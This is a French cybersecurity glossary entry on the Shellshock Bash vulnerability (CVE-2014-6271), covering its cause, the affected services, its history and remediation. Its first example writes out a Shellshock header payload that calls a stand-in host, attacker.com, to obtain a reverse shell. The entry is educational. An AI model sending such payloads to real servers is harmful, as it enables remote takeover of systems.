Skip to content
Vol. 1 · Ed. 2026
CyberGlossary
Français
Entry № 1149

Shellshock (CVE-2014-6271)

Vérifié parCybersecurity entrepreneur & security researcher

Qu'est-ce que Shellshock (CVE-2014-6271) ?

Shellshock (CVE-2014-6271)Vulnérabilité de 2014 dans GNU Bash permettant d'exécuter des commandes arbitraires via des variables d'environnement spécialement conçues transmises à Bash par d'autres programmes.

Shellshock (CVE-2014-6271 et la connexe CVE-2014-7169) provient de la façon dont GNU Bash interprétait les définitions de fonctions stockées dans des variables d'environnement : les commandes situées après le corps de la fonction étaient exécutées au démarrage du shell. Comme de nombreux services — CGI, clients DHCP, OpenSSH ForceCommand, qmail — invoquaient Bash avec des variables contrôlables par l'attaquant, l'exploitation à distance était triviale, souvent en root. La divulgation de 2014 a déclenché une vague mondiale de patches et une exploitation massive (botnets, webshells, vers). La remédiation consiste à mettre à jour Bash, à remplacer les architectures Bash-CGI historiques et à appliquer une défense en profondeur (réduction des privilèges, restriction des variables d'environnement transmises).

Exemples

  1. 01

    Envoyer un User-Agent () { :; }; /bin/curl attacker.com à un endpoint Bash-CGI pour obtenir un reverse shell.

  2. 02

    Exploiter un client DHCP exportant des chaînes d'option dans l'environnement d'un script hook Bash.

Questions fréquentes

Qu'est-ce que Shellshock (CVE-2014-6271) ?

Vulnérabilité de 2014 dans GNU Bash permettant d'exécuter des commandes arbitraires via des variables d'environnement spécialement conçues transmises à Bash par d'autres programmes. Cette notion relève de la catégorie Vulnérabilités en cybersécurité.

Que signifie Shellshock (CVE-2014-6271) ?

Vulnérabilité de 2014 dans GNU Bash permettant d'exécuter des commandes arbitraires via des variables d'environnement spécialement conçues transmises à Bash par d'autres programmes.

Comment se défendre contre Shellshock (CVE-2014-6271) ?

Les défenses contre Shellshock (CVE-2014-6271) combinent habituellement des contrôles techniques et des pratiques opérationnelles, comme détaillé dans la définition ci-dessus.

Quels sont les autres noms de Shellshock (CVE-2014-6271) ?

Noms alternatifs courants : Bashdoor, CVE-2014-6271.

Termes liés